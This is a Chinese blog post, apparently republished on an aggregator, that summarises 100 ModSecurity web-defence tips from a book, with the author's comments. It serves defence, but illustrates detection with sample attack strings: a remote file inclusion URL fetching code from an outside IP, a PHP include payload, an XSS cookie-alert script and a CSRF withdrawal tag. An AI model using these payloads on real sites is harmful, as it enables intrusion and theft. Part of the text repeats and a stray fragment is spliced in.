當(dāng)前位置:
首頁(yè) >
web应用安全防御100技 好书再次阅读, 变的只是表象,被概念迷惑的时候还是静下心来回顾本质...
發(fā)布時(shí)間:2025/4/9
44
豆豆
生活随笔
收集整理的這篇文章主要介紹了
web应用安全防御100技 好书再次阅读, 变的只是表象,被概念迷惑的时候还是静下心来回顾本质...
小編覺(jué)得挺不錯(cuò)的,現(xiàn)在分享給大家,幫大家做個(gè)參考.
如何進(jìn)行web應(yīng)用安全防御,是每個(gè)web安全從業(yè)者都會(huì)被問(wèn)到的問(wèn)題,非常不好回答,容易過(guò)于膚淺或流于理論,要闡明清楚,答案就是一本書的長(zhǎng)度。而本文要介紹一本能很好回答這個(gè)問(wèn)題的優(yōu)秀書籍——《web application defender's cookbook》,這 是一本被低估的“干貨”書籍,雖然是為ModSecurity量身定制,但里面提到的防御技巧對(duì)web安全從業(yè)者均有啟發(fā),是WAF版的孫子兵法(有趣的 是,這本書的每個(gè)章節(jié)均以孫子兵法作為開(kāi)篇語(yǔ))。
這本書提出了使用ModSecurity進(jìn)行web應(yīng)用安全防御的100個(gè)技巧,每個(gè)技巧都用真實(shí)的案例來(lái)說(shuō)明,非常容易掌握,下文介紹這100技及個(gè)人點(diǎn)評(píng)(已經(jīng)準(zhǔn)備好被噴了:))。
第1技 實(shí)時(shí)分析HTTP請(qǐng)求特征 例如請(qǐng)求方法,參數(shù)名,參數(shù)個(gè)數(shù),參數(shù)長(zhǎng)度,參數(shù)取值類型(數(shù)字,字母,email, URL或文件路徑) 腦洞:給HTTP請(qǐng)求做白名單,或?yàn)榱藴?zhǔn)確度給出現(xiàn)過(guò)漏洞的URI做白名單
2015-12-11: ?http請(qǐng)求分析,從長(zhǎng)遠(yuǎn)來(lái)看,有些基本信息庫(kù)必須建立,URL庫(kù)就是其中一個(gè),來(lái)跟進(jìn)每個(gè)站點(diǎn)的URL變化(包括首次訪問(wèn)時(shí)間,最后訪問(wèn)時(shí)間,建站指紋,漏洞列表) e.g. xxx.xxx.xxx/plus/mytag_js.php?aid ?DeDeCMS系統(tǒng) ? ?DeDeCMS一句話寫馬漏洞 ? xxxxxxx首次訪問(wèn) ? ?xxxxx最后訪問(wèn) ... (p.s. 基本信息庫(kù)基本很難建立起來(lái),建立了也很難維持更新,原因嘛,都知道的)
第2技 ?驗(yàn)證hash token預(yù)防數(shù)據(jù)篡改 例如: http://xxx.xxx.xxx/?p=4&rv_token=aafb509403bbf7d78c3c8fe1735d49f01b90eb64 rv_token的驗(yàn)證
第3技 安裝OWASP ModSecurity CRS 該規(guī)則集有兩種模式,一種獨(dú)立檢測(cè)模式,一種協(xié)同檢測(cè)模式(規(guī)則評(píng)分制)
第4技 將IDS Snort規(guī)則轉(zhuǎn)換為ModSecurity規(guī)則 使用?snort2modsec2.pl腳本將Snort規(guī)則轉(zhuǎn)換為ModSecurity規(guī)則 腦洞:安全防御是個(gè)整體,將各個(gè)關(guān)卡有效地聯(lián)動(dòng)起來(lái)形成壁壘
2015-12-11: 規(guī)則一直被歧視(貌似不表示下歧視就low),但我們用事實(shí)說(shuō)話,看看主要安全產(chǎn)品的主要防御方式吧,其中規(guī)則被詬病的主要原因: (1)心理原因,覺(jué)得人人都能寫,不高端 (2)實(shí)際效果,總被繞過(guò), 規(guī)則需要持續(xù)維護(hù)的成本 靜態(tài)規(guī)則如果有一套自動(dòng)化的運(yùn)維系統(tǒng)來(lái)支撐就能持續(xù)發(fā)揮作用 (1)自動(dòng)化規(guī)則漏報(bào)/誤報(bào)檢測(cè):基于異常檢測(cè)來(lái)支撐漏報(bào),基于統(tǒng)計(jì)閾值來(lái)支撐誤報(bào)(已實(shí)踐,效果不錯(cuò)) (2)規(guī)則自動(dòng)化提取生成:上一步的結(jié)果自動(dòng)生成規(guī)則,未實(shí)踐 (3)靜態(tài)規(guī)則的分級(jí)防御:結(jié)合漏洞庫(kù),對(duì)出現(xiàn)過(guò)漏洞的path調(diào)整防御級(jí)別 (4)規(guī)則的通用性轉(zhuǎn)換:漏洞掃描報(bào)告轉(zhuǎn)化為防御規(guī)則,
第5技 使用貝葉斯分類算法區(qū)分惡意請(qǐng)求
第6技 開(kāi)啟HTTP日志審計(jì),設(shè)置粒度為全部記錄
第7技 開(kāi)啟HTTP日志審計(jì),設(shè)置粒度為部分記錄 例如只記錄響應(yīng)碼為4xx的HTTP請(qǐng)求
第8技?開(kāi)啟HTTP日志審計(jì),不記錄靜態(tài)資源訪問(wèn)請(qǐng)求
第9技 將HTTP日志中的敏感信息****化 腦洞:出發(fā)點(diǎn)是尊重用戶隱私,但是不少CDN廠商并不會(huì)這樣做
第10技 使用syslog將server警告信息轉(zhuǎn)發(fā)給中心日志平臺(tái) 作用于分布式/協(xié)同防御系統(tǒng)中的日志收集階段,例如遞交給SIEM系統(tǒng)進(jìn)行分析 2015-12-11: 日志分析技術(shù)并不是新鮮的概念,發(fā)展的只是分析的支撐平臺(tái)(存儲(chǔ)計(jì)算),提高的是處理量級(jí)與效率,(機(jī)器學(xué)習(xí)算法暫不評(píng)價(jià),因?yàn)椴⑽瓷钊?#xff09;,分析的核心還 是分析者的專業(yè)知識(shí)與經(jīng)驗(yàn)(特別是經(jīng)驗(yàn),安全防御是特別需要經(jīng)驗(yàn)的,處理的case多了,大多數(shù)事情就能hold住了)。
第11技 使用更為友好的ModSecurity 的審計(jì)控制平臺(tái)AuditConsole
第12技 被動(dòng)的漏洞識(shí)別方案-通過(guò)讀取漏洞庫(kù)(例如OSVDB)來(lái)識(shí)別漏洞從而進(jìn)行防御 2015-12-11: 安全防御總體說(shuō)是漏洞驅(qū)動(dòng)的,瞧瞧有多少做漏洞平臺(tái)的,無(wú)論官方的還是地下的 小小的感慨下,安全從業(yè)人員的增多并沒(méi)有使得網(wǎng)絡(luò)安全環(huán)境變好反而是惡化,賞金制度的挖洞,催發(fā)出多少未授權(quán)的滲透行為,對(duì)漏洞平臺(tái)人員所說(shuō)的漏洞平臺(tái)會(huì)引導(dǎo)黑帽子持質(zhì)疑的態(tài)度。
拋開(kāi)個(gè)人情緒,漏洞庫(kù)在防御上非常有用。第4技有說(shuō)明
第13技 主動(dòng)的漏洞識(shí)別方案-調(diào)用掃描器(例如Arachni)來(lái)識(shí)別漏洞從而進(jìn)行防御
第14技 ?將掃描器結(jié)果手動(dòng)轉(zhuǎn)化為防御規(guī)則
第15技 ?將掃描器結(jié)果自動(dòng)轉(zhuǎn)化為防御規(guī)則 使用 Arachi2modsec.pl腳本將arachi掃描報(bào)告轉(zhuǎn)換為ModSecurity規(guī)則
第17技 設(shè)置honeypot,新開(kāi)監(jiān)聽(tīng)端口
第18技 設(shè)置honeypot,偽造robots.txt disallow 項(xiàng)與偽造401請(qǐng)求身份驗(yàn)證的請(qǐng)求 腦洞:其實(shí)在中國(guó)區(qū)也發(fā)生過(guò)“正規(guī)”搜索引擎不遵守robots協(xié)議,爬取disallow路徑的案例
第19技 設(shè)置honeypot,偽造HTML注釋 腦洞:黑客一般會(huì)在HTML代碼注釋區(qū)找敏感信息,Burpsuite就專門提供了"find comments"功能。例如在注釋區(qū)增加一個(gè)不存在的uri來(lái)捕獲黑客
第20技 設(shè)置honeypot,偽造隱藏表單域(hidden form fields) 例如增加一個(gè)隱藏表單字段debug,如果HTTP請(qǐng)求中包含這個(gè)隱藏表單,說(shuō)明請(qǐng)求就有攻擊意向
第21技 設(shè)置honeypot,偽造cookie
第22技 使用IP信譽(yù)庫(kù),查詢?cè)L問(wèn)者IP信息 腦洞: MaxMind IP庫(kù),估計(jì)沒(méi)有人沒(méi)聽(tīng)說(shuō)過(guò)
第24技 調(diào)用在線RBL(real-time blacklist)庫(kù)(例如sbl-xbl.spamhaus.org),識(shí)別惡意IP 在線查詢國(guó)際反垃圾郵件組織提供的IP黑庫(kù),或者調(diào)用開(kāi)源的IP黑名單收集蜜罐API接口HTTPBL(Honeypot HTTP Blacklist)進(jìn)行IP信譽(yù)查詢
第25技 創(chuàng)建自己的RBL 使用jwall-rbld創(chuàng)建自己的RBL,https://jwall.org/ 提供了不少java編寫的web安全工具
第26技 調(diào)用URI黑庫(kù)(例如URIBL,Google Safe Browsing API),識(shí)別惡意URI 腦洞:BAT,360,金山等大的互聯(lián)網(wǎng)公司都陸續(xù)開(kāi)放了自己的惡意網(wǎng)址庫(kù)接口
第27技 按需解析HTTP請(qǐng)求體 HTTP請(qǐng)求體的檢測(cè)是非常消耗性能的,所以要加上各種優(yōu)化限制,例如檢測(cè)體長(zhǎng)度限制,緩存到本地文件系統(tǒng)的請(qǐng)求體是否解析(像naxsi就不解析這種),是否解析XML實(shí)體類型等
第28技 識(shí)別不符合協(xié)議規(guī)范帶有潛在惡意的請(qǐng)求體 無(wú)法為協(xié)議解析組件所解析的請(qǐng)求體都有惡意的可能性,例如在multipart-form類型的文件上傳包中構(gòu)造惡意格式繞過(guò)上傳文件類型的限制
第29技 規(guī)范化Unicode編碼 WAF繞過(guò)技巧中有一大分支-編碼繞過(guò),使用編碼映射規(guī)范化編碼是個(gè)不錯(cuò)的點(diǎn)子
第30技 識(shí)別多重編碼 例如兩次urlencode
第31技 識(shí)別異常編碼 驗(yàn)證是否為規(guī)范編碼
第32技 識(shí)別異常的HTTP請(qǐng)求方法 制定HTTP請(qǐng)求白名單,例如只允許GET、POST、HEAD
第34技 識(shí)別HTTP請(qǐng)求頭異常 例如HTTP請(qǐng)求頭缺失、請(qǐng)求頭排列順序異常、請(qǐng)求頭取值異常
第35技 通過(guò)多余參數(shù)識(shí)別攻擊
第36技 通過(guò)缺失參數(shù)識(shí)別攻擊
第37技 通過(guò)重復(fù)參數(shù)(HPP)識(shí)別攻擊 腦洞:正常的應(yīng)用也會(huì)出現(xiàn)重復(fù)參數(shù)的情況,why!!!
第38技 通過(guò)參數(shù)取值長(zhǎng)度異常識(shí)別攻擊
第39技 通過(guò)參數(shù)取值字符類型異常識(shí)別攻擊 采取參數(shù)取值白名單的方式來(lái)防御
第40技?識(shí)別HTTP響應(yīng)頭異常 例如5xx錯(cuò)誤的比例,HTTP響應(yīng)拆分,惡意的重定向
第41技 預(yù)防HTTP響應(yīng)頭中的信息泄漏 移除或偽造服務(wù)簽名響應(yīng)頭,例如Server,X-Powerd-By,X-AspNet-Version
第42技 按需解析HTTP響應(yīng)體 響應(yīng)體的檢測(cè)是極其消耗性能的,所以要參照安全級(jí)別謹(jǐn)慎設(shè)置如何解析HTTP響應(yīng)體
第43技 檢測(cè)網(wǎng)頁(yè)篡改-標(biāo)題篡改
第44技 檢測(cè)網(wǎng)頁(yè)篡改-響應(yīng)體長(zhǎng)度異常 網(wǎng)頁(yè)內(nèi)容被篡改或后端DB被拖庫(kù)時(shí),響應(yīng)體的大小會(huì)發(fā)生明顯的變化 2015-12-11: ?掛馬并不會(huì)發(fā)生大的變化,常見(jiàn)拖庫(kù)行為是否會(huì)引發(fā)明顯變化,需要試驗(yàn)后給出結(jié)論(也是繼webshell檢測(cè)后計(jì)劃試驗(yàn)的)
第45技 檢測(cè)網(wǎng)頁(yè)篡改-響應(yīng)體動(dòng)態(tài)內(nèi)容篡改 例如在表單注入一段<script>alert(document.cookie);</script>,檢查響應(yīng)體中會(huì)出現(xiàn)新的JS標(biāo)簽,我們根據(jù)標(biāo)簽個(gè)數(shù)便能發(fā)現(xiàn)攻擊。
第46技 檢測(cè)響應(yīng)體中的源碼泄漏 例如php-cgi源碼泄漏漏洞CVE-201201823
第47技 檢測(cè)響應(yīng)體中的信息泄漏 例如響應(yīng)體中泄漏源碼絕對(duì)路徑,數(shù)據(jù)庫(kù)信息
第48技 通過(guò)異常的響應(yīng)時(shí)間來(lái)發(fā)現(xiàn)攻擊 例如基于時(shí)間的SQL盲注waitfor delay會(huì)造成異常的響應(yīng)時(shí)間
第49技 檢測(cè)響應(yīng)體中的用戶數(shù)據(jù)泄漏 例如信用卡號(hào)
第50技 檢測(cè)木馬、后門、webshell連接嘗試
第52技 監(jiān)測(cè)登錄口橫向暴力破解 使用同一個(gè)密碼,不同的用戶名來(lái)嘗試暴力破解
第53技 監(jiān)測(cè)失敗的登錄嘗試
第54技 監(jiān)測(cè)高頻率的登錄嘗試
第55技 使用統(tǒng)一的登錄失敗提示,避免有用信息泄漏 像錯(cuò)誤的用戶名或錯(cuò)誤的密碼這種提示會(huì)給暴力破解提供有效信息
第56技 啟用密碼復(fù)雜度檢測(cè)
第57技 分析一個(gè)會(huì)話期,登錄嘗試的用戶名來(lái)發(fā)現(xiàn)登錄口異常
第58技 檢測(cè)異常的cookie取值 基于會(huì)話的攻擊,包括可猜測(cè)的會(huì)話ID取值(burpsuite就集成了會(huì)話sequence分析工具)
第59技 檢測(cè)來(lái)自cookie字段的攻擊 例如cookie字段的SQL注入
第60技 設(shè)置會(huì)話有效期 防御會(huì)話固定攻擊
第61技 檢測(cè)一個(gè)會(huì)話期,請(qǐng)求者IP的GEO信息的變化
第64技 檢測(cè)目錄遍歷攻擊 2015-12-11: ?猜后臺(tái)目錄/漏洞path是比較有效的滲透方法
第65技 ?檢測(cè)非正常流程的網(wǎng)站資源訪問(wèn) 控制URL進(jìn)行橫向權(quán)限提升,縱向權(quán)限提升操作 可以使用加密token(例如url hash)來(lái)防御任意資源訪問(wèn),如下所示 https://www.REDACTED.com/Cust/cust_5.php/222557/20040216?rv_token=abfb508403bbf7d78c3f8de1735d49f01b90eb71
第66技 檢測(cè)SQL注入攻擊 SQL注入的防御方法一般有三種 (1)SQL關(guān)鍵字過(guò)濾器 (2)SQL語(yǔ)義分析 (3)樸素貝葉斯異常分類(使用機(jī)器學(xué)習(xí)算法的異常檢測(cè)) 2015-12-11: ?
第67技 檢測(cè)遠(yuǎn)程文件包含漏洞 當(dāng)URI包含以下情況時(shí),極可能是一次攻擊請(qǐng)求 IP地址,例如/a.php?libdir=http://89.238.174.14/fx.txt??? PHP函數(shù),例如/?id={${include("http://xxx.xx.xx/fx.txt??)}} 多個(gè)?號(hào),例如/a.php?libdir=http://xxx.xx.xx/cgi??? 包含的host與Host頭的字段不符,例如/a.php?libdir=http://www.example.com
第68技 檢測(cè)操作系統(tǒng)命令執(zhí)行漏洞
第69技 檢測(cè)HTTP Request Smuggling HRS攻擊
第70技 檢測(cè)HTTP響應(yīng)拆分漏洞
第71技 檢測(cè)XML攻擊 例如XPath注入
第73技 檢測(cè)XSS攻擊 XSS的防御方法一般有三種 (1)XSS關(guān)鍵字過(guò)濾器 (2)X-XSS-PROTECTION (3)javascript沙盒
第74技 檢測(cè)CRSF攻擊 CSRF防御方法:加密token
第75技 防御UI Redressing(clickjacking) clickjacking防御方法: (1)X-Frame-Options(2)frame-busting javascript
第76技 防御盜號(hào)木馬-中間人攻擊 盜號(hào)木馬一般會(huì)截獲HTTP請(qǐng)求,偽造登錄界面來(lái)盜取賬號(hào),而對(duì)這種釣魚攻擊的防御靈感來(lái)源于文件完整性檢測(cè)工具tripwires,使用JS注入響應(yīng)體md5值附加在登錄頁(yè)面來(lái)驗(yàn)證頁(yè)面完整性。
第77技 限制上傳文件的大小,避免超大文件上傳造成服務(wù)器的拒絕服務(wù)攻擊
第78技 限制上傳文件的數(shù)目,避免過(guò)多文件上傳造成服務(wù)器的拒絕服務(wù)攻擊
第79技 集成病毒掃描工具(例如ClamAV),檢測(cè)上傳文件是否為惡意文件
第80技 HTTP DDoS(CC)攻擊識(shí)別 比較有名的攻擊工具有l(wèi)ow orbit ion cannon LOIC,high orbit ion cannon HOIC 注意與第8技相同只監(jiān)控動(dòng)態(tài)頁(yè)面,因?yàn)殪o態(tài)資源的請(qǐng)求一般會(huì)緩存到CDN節(jié)點(diǎn)而到不了源站
第81技 HTTP slow DDoS攻擊識(shí)別 比較有名的攻擊工具有slowloris
第82技 通過(guò)檢測(cè)后續(xù)請(qǐng)求的響應(yīng)時(shí)間是否過(guò)快來(lái)檢測(cè)CSRF攻擊 例 如CSRF?<img src="http://bank.example.com/withdraw?account=bob&amount=1000000&for=alice"> 受害者訪問(wèn)圖片標(biāo)簽的同時(shí)就發(fā)送了一個(gè)GET請(qǐng)求,兩個(gè)請(qǐng)求的間隔時(shí)間非常短
第83技 檢測(cè)異常的HTTP請(qǐng)求次序 自動(dòng)化攻擊往往會(huì)最小化操作步驟,我們可以參照第2技,第65技,增加token來(lái)預(yù)防自動(dòng)化攻擊
2015-12-11: ?基于圖的異常檢測(cè)方式比較有效,比如檢測(cè)孤立點(diǎn)來(lái)發(fā)現(xiàn)webshell(注意不能只有這個(gè)特征),比如監(jiān)測(cè)非常規(guī)路徑來(lái)發(fā)現(xiàn)越權(quán)訪問(wèn)
第84技 識(shí)別網(wǎng)站特定資源訪問(wèn)量的異常 當(dāng)網(wǎng)站的某個(gè)資源的訪問(wèn)量出現(xiàn)異常的時(shí)候,往往意味著攻擊發(fā)生了,例如新浪微博CSRF蠕蟲攻擊中自動(dòng)發(fā)微博接口的自動(dòng)調(diào)用
第86技 動(dòng)態(tài)開(kāi)啟WAF日志審計(jì) 例如當(dāng)收到來(lái)自IP黑名單的請(qǐng)求時(shí),開(kāi)啟日志審計(jì)功能
第87技 email發(fā)送WAF協(xié)同防御細(xì)節(jié)給站長(zhǎng) 可以調(diào)用外部email發(fā)送腳本也可以使用AuditConsole平臺(tái)(第11技中提到)發(fā)送
第88技 將WAF事件信息通過(guò)請(qǐng)求頭分享給其他安全組件來(lái)進(jìn)行聯(lián)動(dòng)分析 當(dāng)捕獲一個(gè)安全級(jí)別較低的攻擊時(shí),直接攔截就不是個(gè)好的選擇了,這時(shí)候就可以將WAF事件信息分享給其他安全組件進(jìn)行聯(lián)動(dòng)分析來(lái)執(zhí)行合理的應(yīng)對(duì)措施,而通過(guò)HTTP請(qǐng)求頭傳遞WAF事件信息就是個(gè)不錯(cuò)的方案(這種方法叫做request header tagging)。
第89技 將攻擊請(qǐng)求重定向到用戶友好的自定制攔截頁(yè)面
第90技 斷開(kāi)攻擊者的網(wǎng)絡(luò)連接 該措施常用于拒絕服務(wù)攻擊,例如CC攻擊
第91技 使用IP黑名單阻塞工具阻塞惡意用戶訪問(wèn) 一般會(huì)將User-Agent與IP地址聯(lián)合起來(lái)來(lái)阻塞惡意用戶訪問(wèn) 常見(jiàn)的黑名單阻塞工具有jwall-Rbld,Jwall?AuditConsole,?blacklist,samtool(snortsam)
第92技 動(dòng)態(tài)啟用基于IP-GEO信息的分級(jí)防御 例如發(fā)現(xiàn)大量攻擊者來(lái)自X國(guó),對(duì)X國(guó)啟用高級(jí)防御
第93技 通過(guò)延遲對(duì)請(qǐng)求的響應(yīng)時(shí)間來(lái)減緩自動(dòng)化攻擊,給防御者爭(zhēng)取時(shí)間來(lái)應(yīng)對(duì)攻擊
第94技 偽造攻擊成功的返回頁(yè)面來(lái)迷惑攻擊者,給防御者爭(zhēng)取時(shí)間來(lái)應(yīng)對(duì)攻擊 集成honeypot的防御思想
第95技 將攻擊請(qǐng)求代理到honeypot
第96技 當(dāng)檢測(cè)到會(huì)話異常時(shí),強(qiáng)制攻擊者登出 例如當(dāng)會(huì)話期間useragent發(fā)生變化時(shí),強(qiáng)制攻擊者登出
第97技 當(dāng)攻擊事件發(fā)生時(shí),鎖定攻擊者賬號(hào)一段時(shí)間?
第98技 使用JS注入cookie阻塞流量性攻擊(例如CC攻擊)
第99技 使用驗(yàn)證碼阻塞自動(dòng)化(機(jī)器)攻擊 例如自動(dòng)注冊(cè),自動(dòng)發(fā)送垃圾貼等機(jī)器人行為 腦洞:注意驗(yàn)證碼服務(wù)器要足夠健壯,以免招受拒絕服務(wù)攻擊時(shí)導(dǎo)致這一措施失效
第100技 集成BeFF(browser exploit framework)來(lái)分析惡意用戶請(qǐng)求
終于寫完了,我們會(huì)發(fā)現(xiàn)這100個(gè)防御技巧中出現(xiàn)了以下工具(規(guī)范或方法)
WAF(web 應(yīng)用防火墻),Snort(入侵檢測(cè)系統(tǒng)),OSVDB(開(kāi)源漏洞庫(kù)),honeypot(蜜罐),Arachni(漏洞掃描器),BeFF(漏洞挖掘框 架),ClamAV(殺毒軟件),tripwires(文件完整性校驗(yàn)工具,在web領(lǐng)域可以用來(lái)預(yù)防HTTP請(qǐng)求數(shù)據(jù)篡改,釣魚頁(yè)面?zhèn)卧旌妥詣?dòng)化提交請(qǐng) 求),RBL(實(shí)時(shí)IP黑庫(kù),IP信譽(yù)庫(kù)),URIBL Google Safe Browsing API(惡意網(wǎng)址庫(kù)),javascript sandbox(沙箱),SIEM(安全信息與事件管理平臺(tái)), SQL詞法分析器 ,HTTP RFC規(guī)范,編碼映射表,樸素貝葉斯分類算法
于是,可以很容易發(fā)現(xiàn)web安全防御是個(gè)整體,需要將各個(gè)組件(關(guān)卡)有效地聯(lián)動(dòng)起來(lái)形成壁壘,安全防御方法也是沒(méi)有嚴(yán)格的領(lǐng)域區(qū)分的,客戶端的安全技巧可以用于web,反之亦然,同時(shí)在解決某個(gè)安全問(wèn)題時(shí),如果找不到完善的單獨(dú)解決方案,不妨同時(shí)使用不同的有缺陷的防御方案,三個(gè)臭皮匠頂個(gè)諸葛亮。
(2)垂直型安全產(chǎn)品:這種客戶都有著高端或更直接的安全需求,例如欺詐識(shí)別為主的業(yè)務(wù)安全、金融產(chǎn)品安全(比如說(shuō)支付終端漏洞,支付木馬),金融企業(yè)安全(針對(duì)金融行業(yè)的專業(yè)黑客攻擊)
這本書提出了使用ModSecurity進(jìn)行web應(yīng)用安全防御的100個(gè)技巧,每個(gè)技巧都用真實(shí)的案例來(lái)說(shuō)明,非常容易掌握,下文介紹這100技及個(gè)人點(diǎn)評(píng)(已經(jīng)準(zhǔn)備好被噴了:))。
第1技 實(shí)時(shí)分析HTTP請(qǐng)求特征 例如請(qǐng)求方法,參數(shù)名,參數(shù)個(gè)數(shù),參數(shù)長(zhǎng)度,參數(shù)取值類型(數(shù)字,字母,email, URL或文件路徑) 腦洞:給HTTP請(qǐng)求做白名單,或?yàn)榱藴?zhǔn)確度給出現(xiàn)過(guò)漏洞的URI做白名單
2015-12-11: ?http請(qǐng)求分析,從長(zhǎng)遠(yuǎn)來(lái)看,有些基本信息庫(kù)必須建立,URL庫(kù)就是其中一個(gè),來(lái)跟進(jìn)每個(gè)站點(diǎn)的URL變化(包括首次訪問(wèn)時(shí)間,最后訪問(wèn)時(shí)間,建站指紋,漏洞列表) e.g. xxx.xxx.xxx/plus/mytag_js.php?aid ?DeDeCMS系統(tǒng) ? ?DeDeCMS一句話寫馬漏洞 ? xxxxxxx首次訪問(wèn) ? ?xxxxx最后訪問(wèn) ... (p.s. 基本信息庫(kù)基本很難建立起來(lái),建立了也很難維持更新,原因嘛,都知道的)
第2技 ?驗(yàn)證hash token預(yù)防數(shù)據(jù)篡改 例如: http://xxx.xxx.xxx/?p=4&rv_token=aafb509403bbf7d78c3c8fe1735d49f01b90eb64 rv_token的驗(yàn)證
第3技 安裝OWASP ModSecurity CRS 該規(guī)則集有兩種模式,一種獨(dú)立檢測(cè)模式,一種協(xié)同檢測(cè)模式(規(guī)則評(píng)分制)
第4技 將IDS Snort規(guī)則轉(zhuǎn)換為ModSecurity規(guī)則 使用?snort2modsec2.pl腳本將Snort規(guī)則轉(zhuǎn)換為ModSecurity規(guī)則 腦洞:安全防御是個(gè)整體,將各個(gè)關(guān)卡有效地聯(lián)動(dòng)起來(lái)形成壁壘
2015-12-11: 規(guī)則一直被歧視(貌似不表示下歧視就low),但我們用事實(shí)說(shuō)話,看看主要安全產(chǎn)品的主要防御方式吧,其中規(guī)則被詬病的主要原因: (1)心理原因,覺(jué)得人人都能寫,不高端 (2)實(shí)際效果,總被繞過(guò), 規(guī)則需要持續(xù)維護(hù)的成本 靜態(tài)規(guī)則如果有一套自動(dòng)化的運(yùn)維系統(tǒng)來(lái)支撐就能持續(xù)發(fā)揮作用 (1)自動(dòng)化規(guī)則漏報(bào)/誤報(bào)檢測(cè):基于異常檢測(cè)來(lái)支撐漏報(bào),基于統(tǒng)計(jì)閾值來(lái)支撐誤報(bào)(已實(shí)踐,效果不錯(cuò)) (2)規(guī)則自動(dòng)化提取生成:上一步的結(jié)果自動(dòng)生成規(guī)則,未實(shí)踐 (3)靜態(tài)規(guī)則的分級(jí)防御:結(jié)合漏洞庫(kù),對(duì)出現(xiàn)過(guò)漏洞的path調(diào)整防御級(jí)別 (4)規(guī)則的通用性轉(zhuǎn)換:漏洞掃描報(bào)告轉(zhuǎn)化為防御規(guī)則,
第5技 使用貝葉斯分類算法區(qū)分惡意請(qǐng)求
第6技 開(kāi)啟HTTP日志審計(jì),設(shè)置粒度為全部記錄
第7技 開(kāi)啟HTTP日志審計(jì),設(shè)置粒度為部分記錄 例如只記錄響應(yīng)碼為4xx的HTTP請(qǐng)求
第8技?開(kāi)啟HTTP日志審計(jì),不記錄靜態(tài)資源訪問(wèn)請(qǐng)求
第9技 將HTTP日志中的敏感信息****化 腦洞:出發(fā)點(diǎn)是尊重用戶隱私,但是不少CDN廠商并不會(huì)這樣做
第10技 使用syslog將server警告信息轉(zhuǎn)發(fā)給中心日志平臺(tái) 作用于分布式/協(xié)同防御系統(tǒng)中的日志收集階段,例如遞交給SIEM系統(tǒng)進(jìn)行分析 2015-12-11: 日志分析技術(shù)并不是新鮮的概念,發(fā)展的只是分析的支撐平臺(tái)(存儲(chǔ)計(jì)算),提高的是處理量級(jí)與效率,(機(jī)器學(xué)習(xí)算法暫不評(píng)價(jià),因?yàn)椴⑽瓷钊?#xff09;,分析的核心還 是分析者的專業(yè)知識(shí)與經(jīng)驗(yàn)(特別是經(jīng)驗(yàn),安全防御是特別需要經(jīng)驗(yàn)的,處理的case多了,大多數(shù)事情就能hold住了)。
第11技 使用更為友好的ModSecurity 的審計(jì)控制平臺(tái)AuditConsole
第12技 被動(dòng)的漏洞識(shí)別方案-通過(guò)讀取漏洞庫(kù)(例如OSVDB)來(lái)識(shí)別漏洞從而進(jìn)行防御 2015-12-11: 安全防御總體說(shuō)是漏洞驅(qū)動(dòng)的,瞧瞧有多少做漏洞平臺(tái)的,無(wú)論官方的還是地下的 小小的感慨下,安全從業(yè)人員的增多并沒(méi)有使得網(wǎng)絡(luò)安全環(huán)境變好反而是惡化,賞金制度的挖洞,催發(fā)出多少未授權(quán)的滲透行為,對(duì)漏洞平臺(tái)人員所說(shuō)的漏洞平臺(tái)會(huì)引導(dǎo)黑帽子持質(zhì)疑的態(tài)度。
拋開(kāi)個(gè)人情緒,漏洞庫(kù)在防御上非常有用。第4技有說(shuō)明
第13技 主動(dòng)的漏洞識(shí)別方案-調(diào)用掃描器(例如Arachni)來(lái)識(shí)別漏洞從而進(jìn)行防御
第14技 ?將掃描器結(jié)果手動(dòng)轉(zhuǎn)化為防御規(guī)則
第15技 ?將掃描器結(jié)果自動(dòng)轉(zhuǎn)化為防御規(guī)則 使用 Arachi2modsec.pl腳本將arachi掃描報(bào)告轉(zhuǎn)換為ModSecurity規(guī)則
?
第16技 實(shí)時(shí)調(diào)用掃描器(例如Arachni RPC)進(jìn)行防御第17技 設(shè)置honeypot,新開(kāi)監(jiān)聽(tīng)端口
第18技 設(shè)置honeypot,偽造robots.txt disallow 項(xiàng)與偽造401請(qǐng)求身份驗(yàn)證的請(qǐng)求 腦洞:其實(shí)在中國(guó)區(qū)也發(fā)生過(guò)“正規(guī)”搜索引擎不遵守robots協(xié)議,爬取disallow路徑的案例
第19技 設(shè)置honeypot,偽造HTML注釋 腦洞:黑客一般會(huì)在HTML代碼注釋區(qū)找敏感信息,Burpsuite就專門提供了"find comments"功能。例如在注釋區(qū)增加一個(gè)不存在的uri來(lái)捕獲黑客
第20技 設(shè)置honeypot,偽造隱藏表單域(hidden form fields) 例如增加一個(gè)隱藏表單字段debug,如果HTTP請(qǐng)求中包含這個(gè)隱藏表單,說(shuō)明請(qǐng)求就有攻擊意向
第21技 設(shè)置honeypot,偽造cookie
第22技 使用IP信譽(yù)庫(kù),查詢?cè)L問(wèn)者IP信息 腦洞: MaxMind IP庫(kù),估計(jì)沒(méi)有人沒(méi)聽(tīng)說(shuō)過(guò)
?
第23技 使用IP信譽(yù)庫(kù),識(shí)別惡意惡意代理第24技 調(diào)用在線RBL(real-time blacklist)庫(kù)(例如sbl-xbl.spamhaus.org),識(shí)別惡意IP 在線查詢國(guó)際反垃圾郵件組織提供的IP黑庫(kù),或者調(diào)用開(kāi)源的IP黑名單收集蜜罐API接口HTTPBL(Honeypot HTTP Blacklist)進(jìn)行IP信譽(yù)查詢
第25技 創(chuàng)建自己的RBL 使用jwall-rbld創(chuàng)建自己的RBL,https://jwall.org/ 提供了不少java編寫的web安全工具
第26技 調(diào)用URI黑庫(kù)(例如URIBL,Google Safe Browsing API),識(shí)別惡意URI 腦洞:BAT,360,金山等大的互聯(lián)網(wǎng)公司都陸續(xù)開(kāi)放了自己的惡意網(wǎng)址庫(kù)接口
第27技 按需解析HTTP請(qǐng)求體 HTTP請(qǐng)求體的檢測(cè)是非常消耗性能的,所以要加上各種優(yōu)化限制,例如檢測(cè)體長(zhǎng)度限制,緩存到本地文件系統(tǒng)的請(qǐng)求體是否解析(像naxsi就不解析這種),是否解析XML實(shí)體類型等
第28技 識(shí)別不符合協(xié)議規(guī)范帶有潛在惡意的請(qǐng)求體 無(wú)法為協(xié)議解析組件所解析的請(qǐng)求體都有惡意的可能性,例如在multipart-form類型的文件上傳包中構(gòu)造惡意格式繞過(guò)上傳文件類型的限制
第29技 規(guī)范化Unicode編碼 WAF繞過(guò)技巧中有一大分支-編碼繞過(guò),使用編碼映射規(guī)范化編碼是個(gè)不錯(cuò)的點(diǎn)子
第30技 識(shí)別多重編碼 例如兩次urlencode
第31技 識(shí)別異常編碼 驗(yàn)證是否為規(guī)范編碼
